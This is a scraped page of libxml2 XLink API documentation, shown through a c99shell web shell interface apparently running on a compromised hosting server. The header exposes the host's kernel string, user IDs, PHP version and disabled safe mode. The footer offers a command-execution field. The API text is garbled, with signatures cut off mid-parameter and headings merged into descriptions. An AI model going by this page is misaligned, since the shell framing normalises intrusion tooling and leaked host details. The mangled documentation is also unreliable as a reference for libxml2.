Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /opt/alt/libxml2/usr/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
xlinkxlink - unfinished XLink detection module unfinished XLink detection module Author(s): Daniel Veillard Synopsistypedef enum xlinkActuate; typedef xmlChar * xlinkHRef; typedef struct _xlinkHandler xlinkHandler; typedef xlinkHandler * xlinkHandlerPtr; typedef xmlChar * xlinkRole; typedef enum xlinkShow; typedef xmlChar * xlinkTitle; typedef enum xlinkType; typedef void xlinkExtendedLinkFunk (void * ctx, DescriptionDetailsEnum xlinkActuateenum xlinkActuate { XLINK_ACTUATE_NONE = 0 XLINK_ACTUATE_AUTO = 1 XLINK_ACTUATE_ONREQUEST = 2 }; Structure xlinkHandlerstruct _xlinkHandler { xlinkSimpleLinkFunk simple xlinkExtendedLinkFunk extended xlinkExtendedLinkSetFunk set } xlinkHandler; Typedef xlinkHandlerPtrxlinkHandler * xlinkHandlerPtr; Enum xlinkShowenum xlinkShow { XLINK_SHOW_NONE = 0 XLINK_SHOW_NEW = 1 XLINK_SHOW_EMBED = 2 XLINK_SHOW_REPLACE = 3 }; Enum xlinkTypeenum xlinkType { XLINK_TYPE_NONE = 0 XLINK_TYPE_SIMPLE = 1 XLINK_TYPE_EXTENDED = 2 XLINK_TYPE_EXTENDED_SET = 3 }; Function type xlinkExtendedLinkFunkvoid xlinkExtendedLinkFunk (void * ctx, This is the prototype for a extended link detection callback.
Function type xlinkExtendedLinkSetFunkvoid xlinkExtendedLinkSetFunk (void * ctx, This is the prototype for a extended link set detection callback.
Function type xlinkNodeDetectFuncvoid xlinkNodeDetectFunc (void * ctx, This is the prototype for the link detection routine. It calls the default link detection callbacks upon link detection.
Function type xlinkSimpleLinkFunkvoid xlinkSimpleLinkFunk (void * ctx, This is the prototype for a simple link detection callback.
xlinkGetDefaultDetect ()xlinkNodeDetectFunc xlinkGetDefaultDetect (void) Get the default xlink detection routine
xlinkGetDefaultHandler ()xlinkHandlerPtr xlinkGetDefaultHandler (void) Get the default xlink handler.
xlinkIsLink ()xlinkType xlinkIsLink (xmlDocPtr doc, Check whether the given node carries the attributes needed to be a link element (or is one of the linking elements issued from the (X)HTML DtDs). This routine don't try to do full checking of the link validity but tries to detect and return the appropriate link type.
xlinkSetDefaultDetect ()void xlinkSetDefaultDetect (xlinkNodeDetectFunc func) Set the default xlink detection routine
xlinkSetDefaultHandler ()void xlinkSetDefaultHandler (xlinkHandlerPtr handler) Set the default xlink handlers
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0954 ]-- |